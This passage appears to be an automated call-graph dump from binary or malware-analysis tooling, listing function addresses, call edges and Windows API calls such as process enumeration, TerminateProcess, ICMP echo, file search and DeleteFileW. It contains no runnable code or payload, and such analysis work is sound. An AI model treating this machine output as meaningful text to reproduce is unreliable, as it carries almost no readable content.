102659 c3016c 102655->102659 102667 c3521d 7 API calls 2 library calls 102655->102667 102656->102545 102658 c309dd 102669 c33614 RaiseException 102658->102669 102659->102658 102668 c33614 RaiseException 102659->102668 102661 c309fa 102661->102545 102663->102545 102664->102646 102665->102649 102666->102653 102667->102655 102668->102658 102669->102661 102671 c231a1 102670->102671 102678 c2317d 102670->102678 102907 c305b2 5 API calls __Init_thread_wait 102671->102907 102673 c22bb0 102673->102564 102674 c231ab 102674->102678 102908 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102674->102908 102676 c29f47 102676->102673 102910 c30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102676->102910 102678->102673 102909 c305b2 5 API calls __Init_thread_wait 102678->102909 102682 c9a5c5 102680->102682 102681 c18ec0 52 API calls 102683 c9a632 102681->102683 102682->102681 102685 c9a5d4 102682->102685 102911 c818a9 102683->102911 102685->102600 102687 c3017b 8 API calls 102686->102687 102688 c8f95b 102687->102688 102966 c1423c 102688->102966 102691 c18ec0 52 API calls 102692 c8f97c GetEnvironmentVariableW 102691->102692 102969 c8160f 8 API calls 102692->102969 102694 c8f999 messages 102694->102600 102696 c18ec0 52 API calls 102695->102696 102697 c9ad63 102696->102697 102970 c7dd87 CreateToolhelp32Snapshot Process32FirstW 102697->102970 102699 c9ad72 102699->102600 102701 c18ec0 52 API calls 102700->102701 102702 c2ac68 102701->102702 103093 c2bc58 102702->103093 102704 c2ac7f 102715 c2b09b _wcslen 102704->102715 103112 c1c98d 102704->103112 102706 c2bbbe 43 API calls 102706->102715 102711 c16c03 8 API calls 102711->102715 102712 c1c98d 39 API calls 102712->102715 102713 c2b1fb 102713->102600 102714 c18ec0 52 API calls 102714->102715 102715->102706 102715->102711 102715->102712 102715->102713 102715->102714 102716 c18577 8 API calls 102715->102716 103098 c1396b 102715->103098 103108 c13907 102715->103108 103117 c34d98 102715->103117 103127 c17ad5 102715->103127 103132 c1ad40 8 API calls __fread_nolock 102715->103132 103133 c17b1a 8 API calls 102715->103133 102716->102715 103194 c989b6 102719->103194 102721 c99ff8 102721->102600 102723 c18ec0 52 API calls 102722->102723 102724 c86662 102723->102724 103306 c7dc54 102724->103306 102726 c8666a 102727 c8666e GetLastError 102726->102727 102728 c86683 102726->102728 102727->102728 102728->102600 102731 c9a705 102729->102731 102736 c9a6c5 102729->102736 102730 c9a723 102732 c1c98d 39 API calls 102730->102732 102734 c9a780 102730->102734 102730->102736 102731->102730 102733 c1c98d 39 API calls 102731->102733 102732->102734 102733->102730 103348 c80372 102734->103348 102736->102600 102738 c1c98d 39 API calls 102737->102738 102739 c9186c 102738->102739 102740 c1c98d 39 API calls 102739->102740 102742 c918a9 102739->102742 102740->102742 102741 c918cc 102741->102600 102742->102741 102743 c1b4c8 8 API calls 102742->102743 102743->102741 102746 c9aa08 102744->102746 102751 c9a9c8 102744->102751 102745 c9aa26 102747 c1c98d 39 API calls 102745->102747 102749 c9aa8e 102745->102749 102745->102751 102746->102745 102748 c1c98d 39 API calls 102746->102748 102747->102749 102748->102745 102750 c80372 58 API calls 102749->102750 102750->102751 102751->102600 102753 c989b6 119 API calls 102752->102753 102754 c9a00c 102753->102754 102754->102600 102756 c18ec0 52 API calls 102755->102756 102757 c18bf9 102756->102757 102758 c18ec0 52 API calls 102757->102758 102759 c18c0e 102758->102759 102760 c18ec0 52 API calls 102759->102760 102761 c18c21 102760->102761 102762 c18ec0 52 API calls 102761->102762 102763 c18c37 102762->102763 102764 c17ad5 8 API calls 102763->102764 102765 c18c4b 102764->102765 102766 c56767 102765->102766 102767 c1c98d 39 API calls 102765->102767 102769 c17e12 8 API calls 102766->102769 102768 c18c72 102767->102768 102768->102766 102785 c18c98 try_get_first_available_module 102768->102785 102770 c56786 102769->102770 102771 c18470 8 API calls 102770->102771 102772 c56798 102771->102772 102776 c18a60 8 API calls 102772->102776 102784 c567bd 102772->102784 102773 c17e12 8 API calls 102777 c18d4e 102773->102777 102774 c18d3c 102774->102773 102775 c18ec0 52 API calls 102779 c18d27 102775->102779 102776->102784 102780 c56873 102777->102780 102781 c18d5c 102777->102781 102788 c18ec0 52 API calls 102779->102788 102786 c5687d 102780->102786 102787 c568bc 102780->102787 102782 c18d71 102781->102782 102783 c5696e 102781->102783 102790 c18470 8 API calls 102782->102790 102792 c18470 8 API calls 102783->102792 102791 c1893c 8 API calls 102784->102791 102800 c18a60 8 API calls 102784->102800 102828 c18e71 102784->102828 103421 c18844 8 API calls __fread_nolock 102784->103421 102785->102774 102785->102775 102822 c18d91 try_get_first_available_module 102785->102822 102793 c18470 8 API calls 102786->102793 102789 c18470 8 API calls 102787->102789 102788->102774 102794 c568c5 102789->102794 102795 c18d79 102790->102795 102791->102784 102796 c5697b 102792->102796 102797 c56885 102793->102797 102798 c18a60 8 API calls 102794->102798 102799 c1bd57 8 API calls 102795->102799 102801 c18a60 8 API calls 102796->102801 102802 c18ec0 52 API calls 102797->102802 102804 c568e1 102798->102804 102799->102822 102800->102784 102801->102822 102803 c56897 102802->102803 103422 c18844 8 API calls __fread_nolock 102803->103422 102808 c18ec0 52 API calls 102804->102808 102807 c568ab 102809 c1893c 8 API calls 102807->102809 102811 c568fc 102808->102811 102812 c568b9 102809->102812 102810 c1893c 8 API calls 102810->102822 103423 c18844 8 API calls __fread_nolock 102811->103423 102820 c18a60 8 API calls 102812->102820 102813 c569f1 103406 c1893c 102813->103406 102814 c569c1 102814->102813 102816 c569e5 102814->102816 103424 c1ad40 8 API calls __fread_nolock 102816->103424 102819 c56910 102824 c1893c 8 API calls 102819->102824 102820->102828 102822->102810 102822->102814 102822->102828 103409 c18844 8 API calls __fread_nolock 102822->103409 103410 c18a60 102822->103410 102824->102812 102825 c569ef 102826 c18a60 8 API calls 102827 c56a12 102826->102827 102829 c1bd57 8 API calls 102827->102829 102828->102600 102829->102825 102831 c90fe1 102830->102831 102832 c9100f WSAStartup 102831->102832 102833 c1c98d 39 API calls 102831->102833 102834 c91054 102832->102834 102854 c91023 messages 102832->102854 102835 c90ffc 102833->102835 103426 c2c1f6 102834->103426 102835->102832 102838 c1c98d 39 API calls 102835->102838 102840 c9100b 102838->102840 102839 c18ec0 52 API calls 102841 c91069 102839->102841 102840->102832 103431 c2f9d4 WideCharToMultiByte 102841->103431 102843 c91075 inet_addr gethostbyname 102844 c91093 IcmpCreateFile 102843->102844 102843->102854 102845 c910d3 102844->102845 102844->102854 102846 c3017b 8 API calls 102845->102846 102847 c910ec 102846->102847 102848 c1423c 8 API calls 102847->102848 102849 c910f7 102848->102849 102850 c9112b IcmpSendEcho 102849->102850 102851 c91102 IcmpSendEcho 102849->102851 102853 c9114c 102850->102853 102851->102853 102852 c91212 IcmpCloseHandle WSACleanup 102852->102854 102853->102852 102854->102600 102856 c97b38 102855->102856 102857 c97b52 102855->102857 103441 c83fe1 81 API calls __wsopen_s 102856->103441 102859 c960e6 8 API calls 102857->102859 102860 c97b5d 102859->102860 102861 c20340 206 API calls 102860->102861 102862 c97bc1 102861->102862 102863 c97c5c 102862->102863 102866 c97c03 102862->102866 102886 c97b4a 102862->102886 102864 c97cb0 102863->102864 102865 c97c62 102863->102865 102867 c18ec0 52 API calls 102864->102867 102864->102886 103442 c81ad8 8 API calls 102865->103442 102871 c8148b 8 API calls 102866->102871 102869 c97cc2 102867->102869 102872 c1c2c9 8 API calls 102869->102872 102870 c97c85 103443 c1bd07 8 API calls 102870->103443 102874 c97c3b 102871->102874 102875 c97ce6 CharUpperBuffW 102872->102875 102876 c22b20 206 API calls 102874->102876 102877 c97d00 102875->102877 102876->102886 102878 c97d53 102877->102878 102879 c97d07 102877->102879 102880 c18ec0 52 API calls 102878->102880 102882 c8148b 8 API calls 102879->102882 102881 c97d5b 102880->102881 103444 c2aa65 9 API calls 102881->103444 102884 c97d35 102882->102884 102885 c22b20 206 API calls 102884->102885 102885->102886 102886->102563 102887 c97d65 102887->102886 102888 c18ec0 52 API calls 102887->102888 102889 c97d80 102888->102889 103445 c1bd07 8 API calls 102889->103445 102891->102598 102892->102561 102894 c1b338 _wcslen 102893->102894 102895 c3017b 8 API calls 102894->102895 102896 c1b360 __fread_nolock 102895->102896 102897 c3014b 8 API calls 102896->102897 102898 c1b376 102897->102898 102898->102573 102899->102575 102900->102587 102901->102587 102902->102600 102903->102600 102904->102600 102905->102595 102906->102600 102907->102674 102908->102678 102909->102676 102910->102673 102912 c818b6 102911->102912 102913 c3014b 8 API calls 102912->102913 102914 c818bd 102913->102914 102917 c7fcb5 102914->102917 102916 c818f7 102916->102685 102935 c1c2c9 102917->102935 102919 c7fcc8 CharLowerBuffW 102923 c7fcdb 102919->102923 102920 c7fd19 102922 c7fd2b 102920->102922 102956 c1655e 102920->102956 102921 c1655e 8 API calls 102921->102923 102925 c3017b 8 API calls 102922->102925 102923->102920 102923->102921 102934 c7fce5 ___scrt_fastfail 102923->102934 102928 c7fd59 102925->102928 102930 c7fd7b 102928->102930 102959 c7fbed 8 API calls 102928->102959 102929 c7fdb8 102931 c3014b 8 API calls 102929->102931 102929->102934 102941 c7fe0c 102930->102941 102932 c7fdd2 102931->102932 102933 c3017b 8 API calls 102932->102933 102933->102934 102934->102916 102936 c1c2dc 102935->102936 102940 c1c2d9 __fread_nolock 102935->102940 102937 c3014b 8 API calls 102936->102937 102938 c1c2e7 102937->102938 102939 c3017b 8 API calls 102938->102939 102939->102940 102940->102919 102960 c1bf73 102941->102960 102944 c1bf73 8 API calls 102945 c7fe47 102944->102945 102946 c1bf73 8 API calls 102945->102946 102954 c7fe50 102946->102954 102947 c18577 8 API calls 102947->102954 102948 c80114 102948->102929 102949 c1ad40 8 API calls 102949->102954 102950 c366f8 GetStringTypeW 102950->102954 102952 c36641 39 API calls 102952->102954 102953 c7fe0c 40 API calls 102953->102954 102954->102947 102954->102948 102954->102949 102954->102950 102954->102952 102954->102953 102955 c1bed9 8 API calls 102954->102955 102965 c36722 GetStringTypeW _strftime 102954->102965 102955->102954 102957 c1c2c9 8 API calls 102956->102957 102958 c16569 102957->102958 102958->102922 102959->102928 102961 c3017b 8 API calls 102960->102961 102962 c1bf88 102961->102962 102963 c3014b 8 API calls 102962->102963 102964 c1bf96 102963->102964 102964->102944 102965->102954 102967 c3014b 8 API calls 102966->102967 102968 c1424e 102967->102968 102968->102691 102969->102694 102980 c7e80e 102970->102980 102972 c7de86 CloseHandle 102972->102699 102973 c7ddd4 Process32NextW 102973->102972 102978 c7ddcd 102973->102978 102974 c1bf73 8 API calls 102974->102978 102975 c1b329 8 API calls 102975->102978 102978->102972 102978->102973 102978->102974 102978->102975 102986 c1568e 102978->102986 103028 c17bb5 102978->103028 103037 c2e36b 41 API calls 102978->103037 102981 c7e819 102980->102981 102982 c7e830 102981->102982 102985 c7e836 102981->102985 103038 c36722 GetStringTypeW _strftime 102981->103038 103039 c3666b 39 API calls _strftime 102982->103039 102985->102978 102987 c1bf73 8 API calls 102986->102987 102988 c156a4 102987->102988 102989 c1bf73 8 API calls 102988->102989 102990 c156ac 102989->102990 102991 c1bf73 8 API calls 102990->102991 102992 c156b4 102991->102992 102993 c1bf73 8 API calls 102992->102993 102994 c156bc 102993->102994 102995 c156f0 102994->102995 102996 c54da1 102994->102996 102998 c1acc0 8 API calls 102995->102998 102997 c1bed9 8 API calls 102996->102997 102999 c54daa 102997->102999 103000 c156fe 102998->103000 103056 c1bd57 102999->103056 103052 c1adf4 103000->103052 103003 c15708 103004 c15733 103003->103004 103005 c1acc0 8 API calls 103003->103005 103006 c15754 103004->103006 103020 c15778 103004->103020 103023 c54dcc 103004->103023 103008 c15729 103005->103008 103012 c1655e 8 API calls 103006->103012 103006->103020 103010 c1adf4 8 API calls 103008->103010 103009 c15789 103011 c1579f 103009->103011 103015 c1bed9 8 API calls 103009->103015 103010->103004 103016 c1bed9 8 API calls 103011->103016 103018 c157b3 103011->103018 103013 c15761 103012->103013 103019 c1acc0 8 API calls 103013->103019 103013->103020 103015->103011 103016->103018 103017 c157be 103022 c1bed9 8 API calls 103017->103022 103026 c157c9 103017->103026 103018->103017 103021 c1bed9 8 API calls 103018->103021 103019->103020 103040 c1acc0 103020->103040 103021->103017 103022->103026 103062 c18577 103023->103062 103024 c1655e 8 API calls 103025 c54e8c 103024->103025 103025->103020 103025->103024 103074 c1ad40 8 API calls __fread_nolock 103025->103074 103026->102978 103029 c17bc7 103028->103029 103030 c5641d 103028->103030 103077 c17bd8 103029->103077 103087 c713c8 8 API calls __fread_nolock 103030->103087 103033 c17bd3 103033->102978 103034 c56427 103035 c1bed9 8 API calls 103034->103035 103036 c56433 103034->103036 103035->103036 103037->102978 103038->102981 103039->102985 103041 c1accf 103040->103041 103043 c1ace1 103040->103043 103042 c1c2c9 8 API calls 103041->103042 103050 c1acda __fread_nolock 103041->103050 103044 c605a3 __fread_nolock 103042->103044 103043->103041 103045 c60557 103043->103045 103046 c1ad07 103043->103046 103047 c3014b 8 API calls 103045->103047 103075 c188e8 8 API calls 103046->103075 103049 c60561 103047->103049 103051 c3017b 8 API calls 103049->103051 103050->103009 103051->103041 103053 c1ae02 103052->103053 103054 c1ae0b __fread_nolock 103052->103054 103053->103054 103055 c1c2c9 8 API calls 103053->103055 103054->103003 103054->103054 103055->103054 103057 c1bd71 103056->103057 103061 c1bd64 103056->103061 103058 c3014b 8 API calls 103057->103058 103059 c1bd7b 103058->103059 103060 c3017b 8 API calls 103059->103060 103060->103061 103061->103004 103063 c56610 103062->103063 103064 c18587 _wcslen 103062->103064 103065 c1adf4 8 API calls 103063->103065 103067 c185c2 103064->103067 103068 c1859d 103064->103068 103066 c56619 103065->103066 103066->103066 103070 c3014b 8 API calls 103067->103070 103076 c188e8 8 API calls 103068->103076 103071 c185ce 103070->103071 103073 c3017b 8 API calls 103071->103073 103072 c185a5 __fread_nolock 103072->103025 103073->103072 103074->103025 103075->103050 103076->103072 103078 c17c1b __fread_nolock 103077->103078 103079 c17be7 103077->103079 103078->103033 103079->103078 103080 c5644e 103079->103080 103081 c17c0e 103079->103081 103083 c3014b 8 API calls 103080->103083 103088 c17d74 103081->103088 103084 c5645d 103083->103084 103085 c3017b 8 API calls 103084->103085 103086 c56491 __fread_nolock 103085->103086 103087->103034 103089 c17d8a 103088->103089 103092 c17d85 __fread_nolock 103088->103092 103090 c3017b 8 API calls 103089->103090 103091 c56528 103089->103091 103090->103092 103092->103078 103094 c3014b 8 API calls 103093->103094 103095 c2bc65 103094->103095 103096 c1b329 8 API calls 103095->103096 103097 c2bc70 103096->103097 103097->102704 103099 c13996 ___scrt_fastfail 103098->103099 103134 c15f32 103099->103134 103103 c13a1c 103104 c540cd Shell_NotifyIconW 103103->103104 103105 c13a3a Shell_NotifyIconW 103103->103105 103138 c161a9 103105->103138 103107 c13a50 103107->102715 103109 c13969 103108->103109 103110 c13919 ___scrt_fastfail 103108->103110 103109->102715 103111 c13938 Shell_NotifyIconW 103110->103111 103111->103109 103113 c1c99e 103112->103113 103114 c1c9a5 103112->103114 103113->103114 103190 c36641 39 API calls _strftime 103113->103190 103114->102715 103116 c1c9e8 103116->102715 103118 c34da6 103117->103118 103119 c34e1b 103117->103119 103126 c34dcb 103118->103126 103191 c3f649 20 API calls __dosmaperr 103118->103191 103193 c34e2d 40 API calls 2 library calls 103119->103193 103122 c34e28 103122->102715 103123 c34db2 103192 c42b5c 26 API calls _strftime 103123->103192 103125 c34dbd 103125->102715 103126->102715 103128 c3017b 8 API calls 103127->103128 103129 c17afa 103128->103129 103130 c3014b 8 API calls 103129->103130 103131 c17b08 103130->103131 103131->102715 103132->102715 103133->102715 103135 c139eb 103134->103135 103136 c15f4e 103134->103136 103135->103103 103168 c7d11f 42 API calls _strftime 103135->103168 103136->103135 103137 c55070 DestroyIcon 103136->103137 103137->103135 103139 c161c6 103138->103139 103158 c162a8 103138->103158 103140 c17ad5 8 API calls 103139->103140 103141 c161d4 103140->103141 103142 c161e1 103141->103142 103143 c55278 LoadStringW 103141->103143 103144 c18577 8 API calls 103142->103144 103146 c55292 103143->103146 103145 c161f6 103144->103145 103147 c16203 103145->103147 103154 c552ae 103145->103154 103149 c1bed9 8 API calls 103146->103149 103152 c16229 ___scrt_fastfail 103146->103152 103147->103146 103148 c1620d 103147->103148 103169 c16b7c 103148->103169 103149->103152 103156 c1628e Shell_NotifyIconW 103152->103156 103153 c17bb5 8 API calls 103153->103152 103154->103152 103155 c552f1 103154->103155 103157 c1bf73 8 API calls 103154->103157 103179 c2fe6f 51 API calls 103155->103179 103156->103158 103159 c552d8 103157->103159 103158->103107 103178 c7a350 9 API calls 103159->103178 103162 c552e3 103164 c17bb5 8 API calls 103162->103164 103163 c55310 103165 c16b7c 8 API calls 103163->103165 103164->103155 103166 c55321 103165->103166 103167 c16b7c 8 API calls 103166->103167 103167->103152 103168->103103 103170 c16b93 103169->103170 103171 c557fe 103169->103171 103180 c16ba4 103170->103180 103173 c3014b 8 API calls 103171->103173 103175 c55808 _wcslen 103173->103175 103174 c1621b 103174->103153 103176 c3017b 8 API calls 103175->103176 103177 c55841 __fread_nolock 103176->103177 103178->103162 103179->103163 103181 c16bb4 _wcslen 103180->103181 103182 c55860 103181->103182 103183 c16bc7 103181->103183 103185 c3014b 8 API calls 103182->103185 103184 c17d74 8 API calls 103183->103184 103186 c16bd4 __fread_nolock 103184->103186 103187 c5586a 103185->103187 103186->103174 103188 c3017b 8 API calls 103187->103188 103189 c5589a __fread_nolock 103188->103189 103190->103116 103191->103123 103192->103125 103193->103122 103195 c18ec0 52 API calls 103194->103195 103196 c989ed 103195->103196 103218 c98a32 messages 103196->103218 103232 c99730 103196->103232 103198 c98cde 103199 c98eac 103198->103199 103203 c98cec 103198->103203 103281 c99941 59 API calls 103199->103281 103202 c98ebb 103202->103203 103204 c98ec7 103202->103204 103245 c988e3 103203->103245 103204->103218 103205 c18ec0 52 API calls 103221 c98aa6 103205->103221 103210 c98d25 103259 c2ffe0 103210->103259 103213 c98d5f 103267 c17e12 103213->103267 103214 c98d45 103266 c83fe1 81 API calls __wsopen_s 103214->103266 103217 c98d50 GetCurrentProcess TerminateProcess 103217->103213 103218->102721 103221->103198 103221->103205 103221->103218 103264 c74ad3 8 API calls __fread_nolock 103221->103264 103265 c98f7a 41 API calls _strftime 103221->103265 103224 c98f22 103224->103218 103228 c98f36 FreeLibrary 103224->103228 103225 c98d9e 103279 c995d8 74 API calls 103225->103279 103228->103218 103230 c98daf 103230->103224 103231 c1b4c8 8 API calls 103230->103231 103280 c21ca0 8 API calls 103230->103280 103282 c995d8 74 API calls 103230->103282 103231->103230 103233 c1c2c9 8 API calls 103232->103233 103234 c9974b CharLowerBuffW 103233->103234 103283 c79805 103234->103283 103238 c1bf73 8 API calls 103239 c99787 103238->103239 103240 c1acc0 8 API calls 103239->103240 103241 c9979b 103240->103241 103242 c1adf4 8 API calls 103241->103242 103244 c997a5 _wcslen 103242->103244 103243 c998bb _wcslen 103243->103221 103244->103243 103290 c98f7a 41 API calls _strftime 103244->103290 103246 c988fe 103245->103246 103250 c98949 103245->103250 103247 c3017b 8 API calls 103246->103247 103248 c98920 103247->103248 103249 c3014b 8 API calls 103248->103249 103248->103250 103249->103248 103251 c99af3 103250->103251 103252 c99d08 messages 103251->103252 103258 c99b17 _strcat _wcslen ___std_exception_copy 103251->103258 103252->103210 103253 c1c63f 39 API calls 103253->103258 103254 c1c98d 39 API calls 103254->103258 103255 c1ca5b 39 API calls 103255->103258 103256 c18ec0 52 API calls 103256->103258 103258->103252 103258->103253 103258->103254 103258->103255 103258->103256 103293 c7f8c5 10 API calls _wcslen 103258->103293 103260 c2fff5 103259->103260 103261 c3008d Sleep 103260->103261 103262 c3005b 103260->103262 103263 c3007b CloseHandle 103260->103263 103261->103262 103262->103213 103262->103214 103263->103262 103264->103221 103265->103221 103266->103217 103268 c17e1a 103267->103268 103269 c3014b 8 API calls 103268->103269 103270 c17e28 103269->103270 103294 c18445 103270->103294 103273 c18470 103297 c1c760 103273->103297 103275 c18480 103276 c3017b 8 API calls 103275->103276 103277 c1851c 103275->103277 103276->103277 103277->103230 103278 c21ca0 8 API calls 103277->103278 103278->103225 103279->103230 103280->103230 103281->103202 103282->103230 103284 c79825 _wcslen 103283->103284 103285 c79914 103284->103285 103287 c7985a 103284->103287 103289 c79919 103284->103289 103285->103238 103285->103244 103287->103285 103291 c2e36b 41 API calls 103287->103291 103289->103285 103292 c2e36b 41 API calls 103289->103292 103290->103243 103291->103287 103292->103289 103293->103258 103295 c3014b 8 API calls 103294->103295 103296 c17e30 103295->103296 103296->103273 103298 c1c76b 103297->103298 103299 c61285 103298->103299 103304 c1c773 messages 103298->103304 103300 c3014b 8 API calls 103299->103300 103302 c61291 103300->103302 103301 c1c77a 103301->103275 103304->103301 103305 c1c7e0 8 API calls messages 103304->103305 103305->103304 103307 c1bf73 8 API calls 103306->103307 103308 c7dc73 103307->103308 103309 c1bf73 8 API calls 103308->103309 103310 c7dc7c 103309->103310 103311 c1bf73 8 API calls 103310->103311 103312 c7dc85 103311->103312 103330 c15851 103312->103330 103317 c7dcab 103319 c1568e 8 API calls 103317->103319 103318 c16b7c 8 API calls 103318->103317 103320 c7dcbf FindFirstFileW 103319->103320 103321 c7dd4b FindClose 103320->103321 103324 c7dcde 103320->103324 103326 c7dd56 103321->103326 103322 c7dd26 FindNextFileW 103322->103324 103323 c1bed9 8 API calls 103323->103324 103324->103321 103324->103322 103324->103323 103325 c17bb5 8 API calls 103324->103325 103327 c16b7c 8 API calls 103324->103327 103325->103324 103326->102726 103328 c7dd17 DeleteFileW 103327->103328 103328->103322 103329 c7dd42 FindClose 103328->103329 103329->103326 103342 c522d0 103330->103342 103333 c15898 103336 c1bd57 8 API calls 103333->103336 103334 c1587d 103335 c18577 8 API calls 103334->103335 103337 c15889 103335->103337 103336->103337 103344 c155dc 103337->103344 103340 c7eab0 GetFileAttributesW 103341 c7dc99 103340->103341 103341->103317 103341->103318 103343 c1585e GetFullPathNameW 103342->103343 103343->103333 103343->103334 103345 c155ea 103344->103345 103346 c1adf4 8 API calls 103345->103346 103347 c155fe 103346->103347 103347->103340 103380 c802aa 103348->103380 103351 c803f3 103396 c805e9 56 API calls __fread_nolock 103351->103396 103353 c80471 103356 c804a1 103353->103356 103357 c80507 103353->103357 103376 c80399 __fread_nolock 103353->103376 103354 c8040b 103354->103353 103355 c8041b 103354->103355 103360 c80453 103355->103360 103397 c82855 10 API calls 103355->103397 103361 c804d1 103356->103361 103362 c804a6 103356->103362 103358 c805b0 103357->103358 103359 c80510 103357->103359 103358->103376 103405 c1c63f 39 API calls 103358->103405 103363 c8058d 103359->103363 103364 c80515 103359->103364 103387 c81844 103360->103387 103361->103376 103401 c1ca5b 39 API calls 103361->103401 103362->103376 103400 c1ca5b 39 API calls 103362->103400 103363->103376 103404 c1c63f 39 API calls 103363->103404 103366 c8051b 103364->103366 103367 c80554 103364->103367 103366->103376 103402 c1c63f 39 API calls 103366->103402 103367->103376 103403 c1c63f 39 API calls 103367->103403 103375 c80427 103398 c82855 10 API calls 103375->103398 103376->102736 103378 c8043e __fread_nolock 103399 c82855 10 API calls 103378->103399 103381 c802f7 103380->103381 103386 c802bb 103380->103386 103382 c1c98d 39 API calls 103381->103382 103384 c802f5 103382->103384 103383 c18ec0 52 API calls 103383->103386 103384->103351 103384->103354 103384->103376 103385 c34d98 _strftime 40 API calls 103385->103386 103386->103383 103386->103384 103386->103385 103388 c8184f 103387->103388 103389 c3014b 8 API calls 103388->103389 103390 c81856 103389->103390 103391 c81862 103390->103391 103392 c81883 103390->103392 103393 c3017b 8 API calls 103391->103393 103394 c3017b 8 API calls 103392->103394 103395 c8186b ___scrt_fastfail 103393->103395 103394->103395 103395->103376 103396->103376 103397->103375 103398->103378 103399->103360 103400->103376 103401->103376 103402->103376 103403->103376 103404->103376 103405->103376 103407 c3014b 8 API calls 103406->103407 103408 c1894a 103407->103408 103408->102826 103409->102822 103411 c18a76 103410->103411 103412 c56737 103411->103412 103419 c18a80 103411->103419 103425 c2b7a2 8 API calls 103412->103425 103413 c56744 103415 c1b4c8 8 API calls 103413->103415 103416 c56762 103415->103416 103416->103416 103417 c18b94 103418 c3014b 8 API calls 103417->103418 103420 c18b9b 103418->103420 103419->103413 103419->103417 103419->103420 103420->102822 103421->102784 103422->102807 103423->102819 103424->102825 103425->103413 103427 c3017b 8 API calls 103426->103427 103428 c2c209 103427->103428 103429 c3014b 8 API calls 103428->103429 103430 c2c215 103429->103430 103430->102839 103432 c2fa35 103431->103432 103433 c2f9fe 103431->103433 103440 c2fe8a 8 API calls 103432->103440 103435 c3017b 8 API calls 103433->103435 103436 c2fa05 WideCharToMultiByte 103435->103436 103439 c2fa3e 8 API calls __fread_nolock 103436->103439 103438 c2fa29 103438->102843 103439->103438 103440->103438 103441->102886 103442->102870 103443->102886 103444->102887 103445->102886 103446->102624 103447->102624 103448->102631 103449->102625 103450 c61ac5 103451 c61acd 103450->103451 103454 c1d535 103450->103454 103496 c77a87 8 API calls __fread_nolock 103451->103496 103453 c61adf 103497 c77a00 8 API calls __fread_nolock 103453->103497 103457 c3014b 8 API calls 103454->103457 103456 c61b09 103458 c20340 207 API calls 103456->103458 103459 c1d589 103457->103459 103460 c61b30 103458->103460 103480 c1c32d 103459->103480 103461 c61b44 103460->103461 103498 c961a2 53 API calls _wcslen 103460->103498 103465 c3014b 8 API calls 103473 c1d66e messages 103465->103473 103466 c61b61 103466->103454 103499 c77a87 8 API calls __fread_nolock 103466->103499 103469 c1b4c8 8 API calls 103469->103473 103471 c1d9c3 103472 c61f79 103500 c756ae 8 API calls messages 103472->103500 103473->103469 103473->103472 103475 c61f94 103473->103475 103477 c1bed9 8 API calls 103473->103477 103478 c1c3ab 8 API calls 103473->103478 103479 c1d911 messages 103473->103479 103476 c1d9ac messages 103476->103471 103495 c2e30a 8 API calls messages 103476->103495 103477->103473 103478->103473 103479->103476 103487 c1c3ab 103479->103487 103484 c1c33d 103480->103484 103481 c1c345 103481->103465 103482 c3014b 8 API calls 103482->103484 103483 c1bf73 8 API calls 103483->103484 103484->103481 103484->103482 103484->103483 103485 c1bed9 8 API calls 103484->103485 103486 c1c32d 8 API calls 103484->103486 103485->103484 103486->103484 103488 c1c3b9 103487->103488 103494 c1c3e1 messages 103487->103494 103489 c1c3c7 103488->103489 103490 c1c3ab 8 API calls 103488->103490 103491 c1c3cd 103489->103491 103492 c1c3ab 8 API calls 103489->103492 103490->103489 103491->103494 103501 c1c7e0 8 API calls messages 103491->103501 103492->103491 103494->103476 103495->103476 103496->103453 103497->103456 103498->103466 103499->103466 103500->103475 103501->103494 104165 c1f5e5 104166 c1cab0 207 API calls 104165->104166 104167 c1f5f3 104166->104167 103502 c11044 103507 c12793 103502->103507 103504 c1104a 103543 c30413 29 API calls __onexit 103504->103543 103506 c11054 103544 c12a38 103507->103544 103511 c1280a 103512 c1bf73 8 API calls 103511->103512 103513 c12814 103512->103513 103514 c1bf73 8 API calls 103513->103514 103515 c1281e 103514->103515 103516 c1bf73 8 API calls 103515->103516 103517 c12828 103516->103517 103518 c1bf73 8 API calls 103517->103518 103519 c12866 103518->103519 103520 c1bf73 8 API calls 103519->103520 103521 c12932 103520->103521 103554 c12dbc 103521->103554 103525 c12964 103526 c1bf73 8 API calls 103525->103526 103527 c1296e 103526->103527 103528 c23160 9 API calls 103527->103528 103529 c12999 103528->103529 103581 c13166 103529->103581 103531 c129b5 103532 c129c5 GetStdHandle 103531->103532 103533 c539e7 103532->103533 103534 c12a1a 103532->103534 103533->103534 103535 c539f0 103533->103535 103537 c12a27 OleInitialize 103534->103537 103536 c3014b 8 API calls 103535->103536 103538 c539f7 103536->103538 103537->103504 103588 c80ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 103538->103588 103540 c53a00 103589 c812eb CreateThread 103540->103589 103542 c53a0c CloseHandle 103542->103534 103543->103506 103590 c12a91 103544->103590 103547 c12a91 8 API calls 103548 c12a70 103547->103548 103549 c1bf73 8 API calls 103548->103549 103550 c12a7c 103549->103550 103551 c18577 8 API calls 103550->103551 103552 c127c9 103551->103552 103553 c1327e 6 API calls 103552->103553 103553->103511 103555 c1bf73 8 API calls 103554->103555 103556 c12dcc 103555->103556 103557 c1bf73 8 API calls 103556->103557 103558 c12dd4 103557->103558 103597 c181d6 103558->103597 103561 c181d6 8 API calls 103562 c12de4 103561->103562 103563 c1bf73 8 API calls 103562->103563 103564 c12def 103563->103564 103565 c3014b 8 API calls 103564->103565 103566 c1293c 103565->103566 103567 c13205 103566->103567 103568 c13213 103567->103568 103569 c1bf73 8 API calls 103568->103569 103570 c1321e 103569->103570 103571 c1bf73 8 API calls 103570->103571 103572 c13229 103571->103572 103573 c1bf73 8 API calls 103572->103573 103574 c13234 103573->103574 103575 c1bf73 8 API calls 103574->103575 103576 c1323f 103575->103576 103577 c181d6 8 API calls 103576->103577 103578 c1324a 103577->103578 103579 c3014b 8 API calls 103578->103579 103580 c13251 RegisterWindowMessageW 103579->103580 103580->103525 103582 c13176 103581->103582 103583 c53c8f 103581->103583 103584 c3014b 8 API calls 103582->103584 103600 c83c4e 8 API calls 103583->103600 103586 c1317e 103584->103586 103586->103531 103587 c53c9a 103588->103540 103589->103542 103601 c812d1 14 API calls 103589->103601 103591 c1bf73 8 API calls 103590->103591 103592 c12a9c 103591->103592 103593 c1bf73 8 API calls 103592->103593 103594 c12aa4 103593->103594 103595 c1bf73 8 API calls 103594->103595 103596 c12a66 103595->103596 103596->103547 103598 c1bf73 8 API calls 103597->103598 103599 c12ddc 103598->103599 103599->103561 103600->103587 103602 c48782 103607 c4853e 103602->103607 103605 c487aa 103612 c4856f try_get_first_available_module 103607->103612 103609 